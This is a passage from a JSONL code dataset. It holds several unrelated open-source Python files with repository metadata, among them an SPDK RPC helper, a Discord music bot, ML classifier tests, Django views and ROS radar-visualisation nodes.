params['num_queues'] = num_queues\n if qsize:\n params['qsize'] = qsize\n if packed_ring:\n params['packed_ring'] = packed_ring\n\n return client.call('vfu_virtio_create_blk_endpoint', params)\n\n\ndef vfu_virtio_scsi_add_target(client, name, scsi_target_num, bdev_name):\n \"\"\"Attach a block device to the specified SCSI target.\n\n Args:\n name: endpoint name\n scsi_target_num: SCSI target number\n bdev_name: name of block device\n \"\"\"\n params = {\n 'name': name,\n 'scsi_target_num': scsi_target_num,\n 'bdev_name': bdev_name\n }\n\n return client.call('vfu_virtio_scsi_add_target', params)\n\n\ndef vfu_virtio_scsi_remove_target(client, name, scsi_target_num):\n \"\"\"Remove specified SCSI target of socket endpoint.\n\n Args:\n name: endpoint name\n scsi_target_num: SCSI target number\n \"\"\"\n params = {\n 'name': name,\n 'scsi_target_num': scsi_target_num\n }\n\n return client.call('vfu_virtio_scsi_remove_target', params)\n\n\ndef vfu_virtio_create_scsi_endpoint(client, name, cpumask, num_io_queues, qsize, packed_ring):\n \"\"\"Create virtio-scsi endpoint.\n\n Args:\n name: endpoint name\n cpumask: CPU core mask\n num_io_queues: number of IO vrings\n qsize: number of element of each vring\n packed_ring: enable packed ring\n \"\"\"\n params = {\n 'name': name,\n }\n if cpumask:\n params['cpumask'] = cpumask\n if num_io_queues:\n params['num_io_queues'] = num_io_queues\n if qsize:\n params['qsize'] = qsize\n if packed_ring:\n params['packed_ring'] = packed_ring\n\n return client.call('vfu_virtio_create_scsi_endpoint', params)\n","repo_name":"spdk/spdk","sub_path":"python/spdk/rpc/vfio_user.py","file_name":"vfio_user.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":2639,"dataset":"github-code","pt":"83"} +{"seq_id":"18253295785","text":"import os\nfrom aiohttp import client\nfrom discord.ext import commands\nimport lavapy\nbot = commands.Bot(command_prefix=\"!\")\nfrom dotenv import load_dotenv\nfrom lavapy.ext import spotify\n\nload_dotenv()\n\nasync def initialiseNodes():\n \"\"\"\n 
Wait until the bot is ready then create a Lavapy node\n \"\"\"\n await bot.wait_until_ready()\n await lavapy.NodePool.createNode(client=bot,\n host=\"localhost\",\n port=2333,\n password=\"youshallnotpass\",\n spotifyClient=spotify.SpotifyClient(os.getenv(\"clientId\"), os.getenv(\"clientSecret\")))\n\n\n@bot.command()\nasync def play(ctx: commands.Context, *query) -> None:\n \"\"\"\n Play a Youtube song from a given search query.\n\n If the bot is not connected, connect it to the user's voice channel. For this\n to work, the user must be connected to a voice channel\n \"\"\"\n if not ctx.voice_client:\n # Bot is not connected to a voice channel\n try:\n player: lavapy.Player = await ctx.author.voice.channel.connect(cls=lavapy.Player)\n except AttributeError:\n # User is not connected to a voice channel\n await ctx.channel.send(\"You must be connected to a voice channel\")\n return\n else:\n # Bot is connected to a voice channel\n player: lavapy.Player = ctx.voice_client\n # Parse URL to see what to play\n if query[0].startswith(\"https://www.youtube.com/watch?v=\"):\n # Play a Youtube video\n track = await lavapy.YoutubeTrack.search(query[0], player.node)\n elif query[0].startswith(\"https://open.spotify.com/track/\"):\n # Play a Spotify track\n track = await spotify.SpotifyTrack.search(query[0], player.node)\n else:\n # Search for a Youtube video\n track = await lavapy.SoundcloudTrack.search(query[0], player.node)\n await player.play(track)\n\n\n@bot.command()\nasync def pause(ctx: commands.Context) -> None:\n \"\"\"\n Pause the current track.\n \"\"\"\n if ctx.voice_client:\n await ctx.voice_client.pause()\n else:\n await ctx.channel.send(\"Bot is not connected to a voice channel\")\n@bot.command()\nasync def resume(ctx: commands.Context) -> None:\n \"\"\"\n Resume the current track.\n \"\"\"\n if ctx.voice_client:\n await ctx.voice_client.resume()\n else:\n await ctx.channel.send(\"Bot is not connected to a voice channel\")\n\n@bot.command()\nasync def stop(ctx: commands.Context) -> None:\n \"\"\"\n Stop the current track.\n \"\"\"\n if ctx.voice_client:\n await ctx.voice_client.stop()\n else:\n await ctx.channel.send(\"Bot is not connected to a voice channel\")\n@bot.command()\nasync def disconnect(ctx: commands.Context) -> None:\n \"\"\"\n Disconnect the bot from the voice channel.\n \"\"\"\n if ctx.voice_client:\n await ctx.voice_client.disconnect()\n else:\n await ctx.channel.send(\"Bot is not connected to a voice channel\")\n@bot.command()\nasync def volume(ctx: commands.Context, volume: int) -> None:\n \"\"\"\n Change the volume of the bot.\n \"\"\"\n if ctx.voice_client:\n ctx.voice_client.volume = volume\n else:\n await ctx.channel.send(\"Bot is not connected to a voice channel\")\n\nbot.loop.create_task(initialiseNodes())\nbot.run(os.getenv(\"token\"))\n","repo_name":"AuraudZ/discord-spotify-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35283134338","text":"#!/usr/bin/env python3\n# coding=UTF-8\n'''\nDate: 2021-12-06 21:53:46\nLastEditTime: 2021-12-13 01:13:39\nDescription: file content\n'''\nfrom app.HNOX_Pred.run_function import *\nfrom app.HNOX_Pred.color_assigning import *\nfrom app.HNOX_Pred.json_output import *\nimport os\n\n\ndef run(path_result, hash, input_text):\n if not os.path.exists(path_result):\n os.makedirs(path_result)\n # dataframe initialization of template for raw output\n raw_output_template = 
pd.DataFrame({\n 'Hit-No': [0],\n 'Position Start': [0],\n 'Position End': [0],\n 'Sequence': [0],\n 'Hydrophobicity': [0],\n 'Molecular Weight': [0],\n 'Isoelectric Point': [0],\n 'Mean': [0],\n 'Header': ['']\n })\n\n # For txt file as input\n # f_path = 'txt Input/H-NOX (true).txt'\n f_path = os.path.join(os.path.abspath(\n os.path.dirname(__file__)), \"txt Input\", f\"{hash}.txt\")\n with open(f_path, 'w', encoding='utf8') as f:\n f.write(input_text)\n interim_res_pd, pure_sequence_set, sequence_set = main_func_txt_input(\n f_path, raw_output_template)\n\n # process results pd for output, 1. delete line breaker 2. delete last row\n interim_res_pd = process_lineBreaker(interim_res_pd)\n\n # CSV file Converting\n df_final_convertion(interim_res_pd, path_result)\n\n # Color converting\n color_assign_web_run(path_result)\n threshold_assigning_csv(path_result)\n res = json_run(sequence_set, path_result)\n return res\n\n\nif __name__ == '__main__':\n # 储存写出表格的地址\n path_result = ''\n # run(path_result, 'txt Input/H-NOX (true).txt')\n","repo_name":"JasonJiangs/HNOX_Pred","sub_path":"app/HNOX_Pred/Prediction.py","file_name":"Prediction.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32123266655","text":"import sys\r\nimport stdarray\r\nimport stddraw\r\nimport stdrandom\r\nimport stdio\r\nimport fileinput\r\n\r\n\r\n\r\nn = 1000\r\n#with open('in.txt','r', encoding='utf-8') as f:\r\n# read_data = f.read()\r\n# print(read_data)\r\n\r\nfor line in fileinput.input('in.txt'):\r\n\r\n probabilities = stdarray.readFloat1D()\r\n cx = stdarray.readFloat2D()\r\n cy = stdarray.readFloat2D()\r\n\r\n\r\n\r\n\r\n\r\nx = 0.0\r\ny = 0.0\r\nstddraw.setPenRadius(0.001)\r\nfor i in range(n):\r\n r = stdrandom.discrete(probabilities)\r\n x0 = cx[r][0] * x + cx[r][1] * y + cx[r][2]\r\n y0 = cy[r][0] * x + cy[r][1] * y + cy[r][2]\r\n x = x0\r\n y = y0\r\n stddraw.point(x, y)\r\n\r\nstddraw.show()\r\n","repo_name":"alexejkorovin/Educational","sub_path":"leaf.py","file_name":"leaf.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12422438263","text":"from __future__ import annotations\n\n\"\"\"Tests for Sklearn classifier.\"\"\"\n\nimport numpy as np\nfrom sklearn import svm\nfrom sklearn.gaussian_process import GaussianProcessClassifier\nfrom sklearn.gaussian_process.kernels import ConstantKernel\nfrom sklearn.gaussian_process.kernels import RBF\nfrom sklearn.metrics.pairwise import euclidean_distances\nfrom vizier._src.algorithms.classification import classifiers\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\n\nsvm_classifier = svm.SVC(kernel='rbf', C=1.)\ngpc_classifier = GaussianProcessClassifier(\n kernel=ConstantKernel(1.) 
* RBF(length_scale=1.))\n\n\n# TODO: convert it into a generic ClassifierTest for all subclasses.\nclass SklearnClassifierTest(parameterized.TestCase):\n \"\"\"Class for testing the classifier.\"\"\"\n\n def setUp(self):\n super().setUp()\n self.features_train = np.array([[1.], [2.], [3.], [4.]])\n self.labels_train = np.array([0, 0, 1, 1])\n self.labels_train_invalid = np.array([10., 10., 11., 11.])\n self.features_test = np.array([[-1.], [6.], [0.], [6.]])\n\n def test_raise_error_invalid_labels(self):\n classifier_instance = classifiers.SklearnClassifier(\n classifier=gpc_classifier,\n features=self.features_train,\n labels=self.labels_train_invalid,\n features_test=self.features_test,\n eval_metric='probability')\n with self.assertRaises(ValueError):\n classifier_instance._check_labels_values()\n\n @parameterized.parameters([\n dict(classifier=svm_classifier, eval_metric='decision'),\n dict(classifier=gpc_classifier, eval_metric='probability')\n ])\n def test_scores_shape(self, classifier, eval_metric):\n classifier_instance = classifiers.SklearnClassifier(\n classifier=classifier,\n features=self.features_train,\n labels=self.labels_train,\n features_test=self.features_test,\n eval_metric=eval_metric)\n scores = classifier_instance()\n self.assertEqual(scores.shape[0], self.features_test.shape[0])\n\n @parameterized.parameters([\n dict(classifier=svm_classifier, eval_metric='decision', threshold=0.),\n dict(classifier=gpc_classifier, eval_metric='probability', threshold=0.5)\n ])\n def test_labels_shape(self, classifier, eval_metric, threshold):\n classifier_instance = classifiers.SklearnClassifier(\n classifier=classifier,\n features=self.features_train,\n labels=self.labels_train,\n features_test=self.features_test,\n eval_metric=eval_metric)\n scores = classifier_instance()\n labels_test_pred = (scores >= threshold).astype(float)\n labels_test_real = np.array([0, 1, 0, 1])\n self.assertTrue((labels_test_pred == labels_test_real).all())\n\n @parameterized.parameters([dict(label_val=0.), dict(label_val=1.)])\n def test_raise_error_identical_labels(self, label_val):\n labels_train_identical = np.ones(\n (self.features_train.shape[0],)) * label_val\n classifier_instance = classifiers.SklearnClassifier(\n classifier=gpc_classifier,\n features=self.features_train,\n labels=labels_train_identical,\n features_test=self.features_test,\n eval_metric='probability')\n with self.assertRaises(ValueError):\n classifier_instance._check_labels_values()\n\n @parameterized.parameters([\n dict(classifier=svm_classifier, eval_metric='decision'),\n dict(classifier=gpc_classifier, eval_metric='probability')\n ])\n def test_scores_range(self, classifier, eval_metric):\n classifier_instance = classifiers.SklearnClassifier(\n classifier=classifier,\n features=self.features_train,\n labels=self.labels_train,\n features_test=self.features_test,\n eval_metric=eval_metric)\n scores = classifier_instance()\n if eval_metric == 'probability':\n self.assertGreaterEqual(scores.min(), 0.)\n self.assertLessEqual(scores.max(), 1.)\n else:\n max_distance = max(\n euclidean_distances(self.features_test).max(),\n euclidean_distances(self.features_train).max(),\n euclidean_distances(self.features_train, self.features_test).max())\n self.assertLessEqual(scores.max(), max_distance)\n\n @parameterized.parameters([\n dict(classifier=svm_classifier, eval_metric='decision', threshold=0.),\n dict(classifier=gpc_classifier, eval_metric='probability', threshold=0.5)\n ])\n def test_prediction_on_train_data(self, classifier, 
eval_metric, threshold):\n classifier_instance = classifiers.SklearnClassifier(\n classifier=classifier,\n features=self.features_train,\n labels=self.labels_train,\n features_test=self.features_train,\n eval_metric=eval_metric)\n scores = classifier_instance()\n labels_test_pred = (scores >= threshold).astype(float)\n self.assertTrue((labels_test_pred == self.labels_train).all())\n\n\nif __name__ == '__main__':\n absltest.main()\n","repo_name":"google/vizier","sub_path":"vizier/_src/algorithms/classification/classifiers_test.py","file_name":"classifiers_test.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":1119,"dataset":"github-code","pt":"83"} +{"seq_id":"70739292752","text":"# 1608. Special Array With X Elements Greater Than or Equal X\n\nclass Solution:\n def specialArray(self, nums: List[int]) -> int:\n # sort array first\n sorted_nums = sorted(nums)\n\n for x in range(len(sorted_nums) + 1):\n # there should be x numbers >= x\n # using binary search to get the position where is start to be greater than x\n\n start = len(sorted_nums) - 1\n\n left, right = 0, len(sorted_nums) - 1\n while left <= right:\n mid = left + (right - left) // 2\n\n if sorted_nums[mid] < x:\n left = mid + 1\n else:\n right = mid - 1\n\n start = left\n\n # return answer if x numbers >= x\n if len(sorted_nums) - start == x:\n return x\n\n return -1\n","repo_name":"xxrjun/leetcode-python","sub_path":"solutions-python3/1608-SpecialArrayWithXElementsGreaterThanorEqualX.py","file_name":"1608-SpecialArrayWithXElementsGreaterThanorEqualX.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"8786540112","text":"import os\nimport csv\nbudget_csv = 'budget_data.csv'\n\n#The total number of months is equal to the number of rows - headerline\ntotal_months = sum(1 for line in open(budget_csv)) - 1\n\nchange = 0\ntotal_change = 0\nline = 0\nchanges =[]\n\ncsvfile = open(budget_csv)\ncsvreader = csv.reader(csvfile, delimiter=\",\")\nnext(csvreader) \nfor row in csvreader:\n total = int(row[1])\n previous_revenue = int(row[1])\n #print(previous_revenue)\n for row in csvreader:\n change = int(row[1]) - previous_revenue\n #print(previous_revenue)\n changes.append(change)\n previous_revenue = int(row[1])\n #print(change)\n total += int(row[1])\n\nmax_value = max(changes)\nmax_index = changes.index(max_value)\nmin_value = min(changes)\nmin_index = changes.index(min_value)\n#print(max_value, max_index, min_value, min_index)\n#print(changes)\ntotal_change = sum(changes) \n#print(total_change)\naverage_change = total_change/len(changes) \n#print(average_change)\nprint (\"Financial Analysis\")\nprint(\"----------------------\")\nprint (f'Total Months: {total_months}')\nprint(f'Total: ${total}') \nprint(f\"Average Change: ${average_change}\") \n\ncsvfile = open(budget_csv)\ncsvreader = csv.reader(csvfile, delimiter=\",\")\nnext(csvreader)\nfor row in csvreader:\n line += 1\n #index + 2 because we skipped 2 lines before\n if line == max_index + 2:\n increase = row[0]\n print(\"Greatest Increase in Profits: {}({})\".format(increase, max_value))\n if line == min_index + 2:\n decrease = row[0]\n print(\"Greatest Decrease in Profits: {}({})\".format(decrease, min_value)) \n\n\ndata_output = open(\"data.txt\", \"w\")\n\n# Write data to a .txt file\ndata_output.write(\"Financial Analysis\\n\")\ndata_output.write(\"----------------------\\n\")\ndata_output.write(f'Total Months: 
{total_months}\\n')\ndata_output.write(f'Total: ${total}\\n')\ndata_output.write(f\"Average Change: ${average_change}\\n\")\ndata_output.write(\"Greatest Increase in Profits: {}({})\\n\".format(increase, max_value))\ndata_output.write(\"Greatest Decrease in Profits: {}({})\".format(decrease, min_value))\n\n \n\n\n\n\n\n","repo_name":"lvdmit/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"31862678288","text":"from django.views.generic import FormView, RedirectView, TemplateView\nfrom django.views.decorators.debug import sensitive_post_parameters\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views.decorators.cache import never_cache\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth import logout, login\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.core.urlresolvers import reverse\nfrom django.contrib import messages\n\nfrom apps.project.services import ProjectService\nfrom apps.project.forms import ProjectForm, ProjectMembersForm\nfrom apps.gocd.services import GOCDService\n\n\nclass ProjectListView(TemplateView):\n template_name = \"project/project-list.html\"\n\n def get_context_data(self, *args, **kwargs):\n context = super(ProjectListView, self).get_context_data(*args, **kwargs)\n context['projects'] = ProjectService().get_all_projects()\n return context\n\n\nclass ProjectCreateView(FormView):\n template_name = \"project/create.html\"\n form_class = ProjectForm\n\n def form_valid(self, form, *args, **kwargs):\n messages.add_message(\n self.request, messages.SUCCESS, \"Created new project\")\n service = ProjectService()\n project = service.create_project(\n self.request.user,\n form.cleaned_data['name'],\n form.cleaned_data['description'],\n visible_to_all=form.cleaned_data['visible_to_all'])\n\n return HttpResponseRedirect(self.get_success_url())\n\n def get_success_url(self):\n return reverse('project:project-list')\n\n\nclass ProjectSettingsView(TemplateView):\n template_name = \"project/settings.html\"\n\n def get_context_data(self, *args, **kwargs):\n context = super(ProjectSettingsView, self).get_context_data(*args, **kwargs)\n project = ProjectService().get_project_by_pk(self.kwargs['pk'])\n context['project_form'] = ProjectForm(\n initial=self.get_project_initial(project))\n context['project_members_form'] = ProjectMembersForm(\n initial=self.get_project_members_initial())\n return context\n\n def get_project_initial(self, project):\n return {'name': project.name,\n 'description': project.description,\n 'visible_to_all': project.visible_to_all,\n 'gocd_server_host': project.gocd_server_host,\n 'gocd_server_port': project.gocd_server_port,\n 'gocd_server_username': project.gocd_server_username,\n 'gocd_server_password': project.gocd_server_password}\n\n def get_project_members_initial(self):\n return {}\n\n\nclass ProjectDetailView(TemplateView):\n template_name = \"project/detail.html\"\n\n def get_context_data(self, *args, **kwargs):\n context = super(ProjectDetailView, self).get_context_data(*args, **kwargs)\n project = ProjectService().get_project_by_pk(self.kwargs['pk'])\n context['project'] = project\n status, reason = GOCDService().test_connection(\n project.gocd_server_host, project.gocd_server_port,\n project.gocd_server_username, project.gocd_server_password)\n context['gocd_connection'] = status\n context['gocd_reason'] = 
reason\n pipeline_groups = GOCDService().get_pipeline_groups(\n project.gocd_server_host, project.gocd_server_port,\n project.gocd_server_username, project.gocd_server_password)\n context['pipeline_groups'] = ProjectService().get_groups_for_project(\n project, pipeline_groups)\n return context\n","repo_name":"scaryclam/gocd-interface","sub_path":"sites/gocd-interface/apps/project/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12619787494","text":"\nimport pandas as pd\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn import metrics\n\nfrom time import time\n\ndef load_data(file=\"questions.txt\"):\n df = pd.read_csv(file, sep=\",,,\", header=None,\n names=['question', 'label'],engine=\"python\")\n labelled_file = open('questions.txt')\n data = labelled_file.readlines()\n df['label']= df['label'].str.strip()\n\n split = StratifiedShuffleSplit(n_splits=1, test_size=0.3, random_state=42)\n for train_index, test_index in split.split(df['question'],df['label']):\n X_train,X_test = df['question'][train_index], df['question'][test_index]\n y_train, y_test = df['label'][train_index], df['label'][test_index]\n\n\n return X_train,y_train,X_test,y_test\n\n\ndef benchmark(clf,X_train_text,y_train,X_test_text,y_test,tf_idf=False):\n if tf_idf:\n vectorizer = TfidfVectorizer(sublinear_tf=True, max_df=0.5,\n stop_words='english')\n else:\n vectorizer = CountVectorizer(analyzer='word',lowercase=True)\n\n X_train = vectorizer.fit_transform(X_train_text)\n X_test= vectorizer.transform(X_test_text)\n print('_' * 80)\n print(\"Training: \")\n print(clf)\n t0 = time()\n clf.fit(X_train, y_train)\n train_time = time() - t0\n print(\"train time: %0.3fs\" % train_time)\n\n t0 = time()\n pred = clf.predict(X_test)\n test_time = time() - t0\n print(\"test time: %0.3fs\" % test_time)\n\n score = metrics.accuracy_score(y_test, pred)\n print(\"accuracy: %0.3f\" % score)\n\n\n print(\"classification report:\")\n print(metrics.classification_report(y_test, pred))\n\n\n #print(\"confusion matrix:\")\n #print(metrics.confusion_matrix(y_test, pred))\n\n print()\n clf_descr = str(clf).split('(')[0]\n return vectorizer,clf_descr, score, train_time, test_time\n\n\n","repo_name":"amitbcp/machine_learning_problems","sub_path":"scikit-learn/5_question-classification/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"83"} +{"seq_id":"37344489331","text":"import json\nfrom typing import List, Dict\n\ndef load_config(path='./data/config.json'):\n \"\"\"\n Load the config file from the path specified\n :param path:\n :return:\n \"\"\"\n with open(path, 'r') as f:\n res = json.load(f)\n return res\n\n\nrd = load_config()\n\n# Some general information\nBASE = rd['BASE']\nOAUTH_ID = rd['OAUTH_ID']\nAPI_KEY = rd['API_KEY']\nCOMMAND = rd['COMMAND']\nHOST = rd['HOST']\nPORT = rd['PORT']\n\n# Request header\nHEADER = {\"X-API-Key\": API_KEY}\nDEBUG = False\n\n# For API use\nCLASS_REF = {\n 0: \"泰坦\",\n 1: \"猎人\",\n 2: \"术士\"\n}\n\n# Environment\nENV = {\n 'cmd': []\n}\n\n\"\"\"\nPossible keys in the environment:\n- cmd: all possible commands, loaded by each module\n\"\"\"\n\nMsg_Comp = 
List[Dict]","repo_name":"KeithMaxwellZ/QQBot-Mirai","sub_path":"p_var.py","file_name":"p_var.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"38468296172","text":"#!/usr/bin/env python\n\nimport rospy\nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom pdk_ros_msg.msg import pdk_RadarObjectList\nfrom tf.transformations import quaternion_from_euler\nimport math\n\npub_filtered = rospy.Publisher('filtered_data_topic', pdk_RadarObjectList, queue_size=10)\n\ndef radar_object_list_callback(data):\n # Create a new marker\n marker = Marker()\n marker.header = data.header\n marker.header.frame_id = \"base_footprint\"\n marker.ns = \"radar_objects\"\n marker.id = data.u_ObjId # Use a unique ID for the marker\n marker.type = Marker.ARROW\n marker.action = Marker.ADD\n marker.lifetime = rospy.Duration(0.7)\n\n\n # Set the marker position and orientation to represent the whole object list\n marker.pose.position.x = data.f_DistX # Use the first object's position\n marker.pose.position.y = data.f_DistY\n marker.pose.position.z = 0.0\n\n \n yaw = math.atan2(data.f_VabsY, data.f_VabsX)\n q = quaternion_from_euler(0, 0, yaw)\n \n\n marker.pose.orientation.x = q[0]\n marker.pose.orientation.y = q[1]\n marker.pose.orientation.z = q[2]\n marker.pose.orientation.w = q[3]\n\n # Calculate the overall size of the marker based on the object list\n marker.scale.x = 1.0\n marker.scale.y = 1.0\n marker.scale.z = 1.0\n\n # Set the marker color to represent the whole object list\n marker.color.r = 0.0 # Use the first object's color\n marker.color.g = 0.0\n marker.color.b = 1.0\n marker.color.a = 1.0\n\n # Publish the marker\n marker_array_msg.markers = [marker]\n #print(\"Unfiltered Object ID:\", data.u_ObjId)\n #print(\"Unfiltered Object Score:\", data.f_ObjectScore)\n #print(\"Unfiltered Object DistX:\", data.f_DistX)\n #print(\"Unfiltered Object DistY:\", data.f_DistY)\n marker_array_pub_unfiltered.publish(marker_array_msg)\n\ndef filtered_radar_object_list_callback(data):\n # Create a new marker\n marker = Marker()\n marker.header = data.header\n marker.header.frame_id = \"base_footprint\"\n marker.lifetime = rospy.Duration(0.7)\n if data.f_ObjectScore > 0.90 and -50 < data.f_DistX < 50 and -50 < data.f_DistY < 50:\n marker.ns = \"radar_objects\"\n marker.id = data.u_ObjId # Use a unique ID for the marker\n marker.action = Marker.ADD\n # Set the marker position and orientation to represent the whole object list\n \n marker.type = Marker.ARROW\n marker.color.r = 1.0 # Use the first object's color\n marker.color.g = 0.0\n marker.color.b = 0.0\n marker.color.a = 1.0\n marker.pose.position.x = data.f_DistX # Use the first object's position\n marker.pose.position.y = data.f_DistY\n marker.pose.position.z = 1\n marker.pose.orientation.w = 1.0\n marker.pose.orientation.x = 0.0\n marker.pose.orientation.y = 0.0\n marker.pose.orientation.z = 0.0\n\n # Calculate the overall size of the marker based on the object list\n marker.scale.x = 1.0\n marker.scale.y = 1.0\n marker.scale.z = 1.0\n\n\n # Publish the marker\n marker_array_msg.markers = [marker]\n #print(\"Filtered Object ID:\", data.u_ObjId)\n #print(\"Filtered Object Score:\", data.f_ObjectScore)\n #print(\"Filtered Object DistX:\", data.f_DistX)\n #print(\"Filtered Object DistY:\", data.f_DistY)\n marker_array_pub_filtered.publish(marker_array_msg)\n\n \n \n # Determine the object size based on bounding box distances\n ''' \n size_x = data.f_LDeltaX_left 
+ data.f_LDeltaX_mid + data.f_LDeltaX_right\n size_y = data.f_LDeltaY_left + data.f_LDeltaY_mid + data.f_LDeltaY_right\n size_z = 2.0 # Set a default size in the z direction (vertical)\n\n # Determine the object type based on size\n \n if size_x < 0.5 and size_y < 2.0 : # Assuming size.x represents the width of the object and y represents the height \n marker.ns = \"Humans\"\n marker.type = Marker.ARROW\n marker.color.r = 1.0 # Use the first object's color\n marker.color.g = 0.0\n marker.color.b = 0.0\n marker.color.a = 1.0\n elif size_x < 5.0 and size_y < 2.0:\n marker.ns = \"cars\"\n marker.type = Marker.CYLINDER\n marker.color.r = 0.0 # Use the first object's color\n marker.color.g = 1.0\n marker.color.b = 0.0\n marker.color.a = 1.0\n else:\n marker.ns = \"others\"\n marker.type = Marker.SPHERE # Default shape for other objects\n marker.color.r = 0.0 # Use the first object's color\n marker.color.g = 0.0\n marker.color.b = 1.0\n marker.color.a = 1.0\n '''\n \n\ndef callback(data):\n if data.f_ObjectScore > 0.9 and -50 < data.f_DistX < 50 and -50 < data.f_DistY < 50:\n \n\t# Create a new message for the filtered data\n filtered_message = pdk_RadarObjectList ()\n filtered_message.header = data.header\n filtered_message.u_ObjId = data.u_ObjId\n filtered_message.f_DistX = data.f_DistX\n filtered_message.f_DistY = data.f_DistY\n filtered_message.f_VrelX = data.f_VrelX\n filtered_message.f_VrelY = data.f_VrelY\n filtered_message.f_ArelX = data.f_ArelX\n filtered_message.f_ArelY = data.f_ArelY\n filtered_message.f_DistXStd = data.f_DistXStd\n filtered_message.f_DistYStd = data.f_DistYStd\n filtered_message.f_VrelXStd = data.f_VrelXStd\n filtered_message.f_VrelYStd = data.f_VrelYStd\n filtered_message.f_ArelXStd = data.f_ArelXStd\n filtered_message.f_ArelYStd = data.f_ArelYStd\n filtered_message.f_LDeltaX_left = data.f_LDeltaX_left\n filtered_message.f_LDeltaX_mid = data.f_LDeltaX_mid\n filtered_message.f_LDeltaX_right = data.f_LDeltaX_right\n filtered_message.f_LDeltaY_left = data.f_LDeltaY_left\n filtered_message.f_LDeltaY_mid = data.f_LDeltaY_mid\n filtered_message.f_LDeltaY_right = data.f_LDeltaY_right\n filtered_message.f_RCS = data.f_RCS\n filtered_message.f_ObjectScore = data.f_ObjectScore\n filtered_message.u_LifeCycles = data.u_LifeCycles\n filtered_message.f_VabsX = data.f_VabsX\n filtered_message.f_VabsY = data.f_VabsY\n filtered_message.f_AabsX = data.f_AabsX\n filtered_message.f_AabsY = data.f_AabsY\n filtered_message.f_VabsXStd = data.f_VabsXStd\n filtered_message.f_VabsYStd = data.f_VabsYStd\n filtered_message.f_AabsXStd = data.f_AabsXStd\n filtered_message.f_AabsYStd = data.f_AabsYStd\n \n \n # Print the filtered data attributes\n #print(\"filtered_message.u_ObjId:\", data.u_ObjId)\n #print(\"filtered_message.f_ObjectScore:\", data.f_ObjectScore)\n #print(\"filtered_message.f_DistX:\", data.f_DistX)\n #print(\"filtered_message.f_DistY:\", data.f_DistY)\n \n # Publish the filtered data to the new topic\n pub_filtered.publish(filtered_message)\n \n\nif __name__ == '__main__':\n rospy.init_node('pdk_tracking_filter_and_visualization')\n # Create a marker array publisher\n marker_array_pub_unfiltered = rospy.Publisher('/pdk/tracking/visualization_marker_array', MarkerArray, queue_size=10)\n marker_array_pub_filtered = rospy.Publisher('/pdk/tracking/filtered_marker_array', MarkerArray, queue_size=10)\n marker_array_msg = MarkerArray()\n\n # Subscribe to the pdk_RadarObjectList topic\n rospy.Subscriber('/pdk/tracking', pdk_RadarObjectList, radar_object_list_callback)\n 
rospy.Subscriber('/pdk/tracking', pdk_RadarObjectList, filtered_radar_object_list_callback)\n rospy.Subscriber('/pdk/tracking', pdk_RadarObjectList, callback)\n # Spin and wait for messages\n rospy.spin()\n","repo_name":"Kaustubh3197/pdk_ros","sub_path":"pdk_ros_msgs/src/pdk_tracking_filter_and_visualization.py","file_name":"pdk_tracking_filter_and_visualization.py","file_ext":"py","file_size_in_byte":7612,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"13032385161","text":"import sys\nimport os\n\nfrom PostTelemac.meshlayer.post_telemac_pluginlayer import SelafinPluginLayer\nfrom PostTelemac.meshlayertools.meshlayer_compare_tool import CompareTool\n\n\n\ndef testCompareTool():\n \n print('begin')\n #path = os.path.normpath('C://00_Bureau//data2//SMEAG_REF_Q100.res')\n path1 = os.path.normpath('C://00_Bureau//00_QGIs//testcompare//SMEAG_R1_ARA_Q100_MAX.res')\n path2 = os.path.normpath('C://00_Bureau//00_QGIs//testcompare//SMEAG_REF_Q5_MAX.res')\n slf = SelafinPluginLayer()\n print('slf created')\n slf.load_selafin(path1,'TELEMAC')\n print('slf loaded')\n \n slf.propertiesdialog.debugtoprint = True\n \n comparetool = CompareTool(slf,slf.propertiesdialog)\n \n comparetool.initCompare(path2)\n comparetool.checkBox_6.setCheckState(2)\n \n comparetool.compare1(0)\n \n \n \n print('done')\n \n \ntestCompareTool()\n \n \n \n\n \n \n \n","repo_name":"Artelia/PostTelemac","sub_path":"tests/test_tool_compare.py","file_name":"test_tool_compare.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"83"} +{"seq_id":"27423524537","text":"import rclpy\n# import the ROS2 python dependencies\nfrom rclpy.node import Node\n# import the Twist module from geometry_msgs dependencies\nfrom geometry_msgs.msg import Twist\n# import the LaserScan module from sensor_msgs dependencies\nfrom sensor_msgs.msg import LaserScan\nfrom rclpy.qos import ReliabilityPolicy, QoSProfile\nfrom custom_interfaces.msg import Age\n\nclass Example36(Node):\n\n def __init__(self):\n # Here we have the class 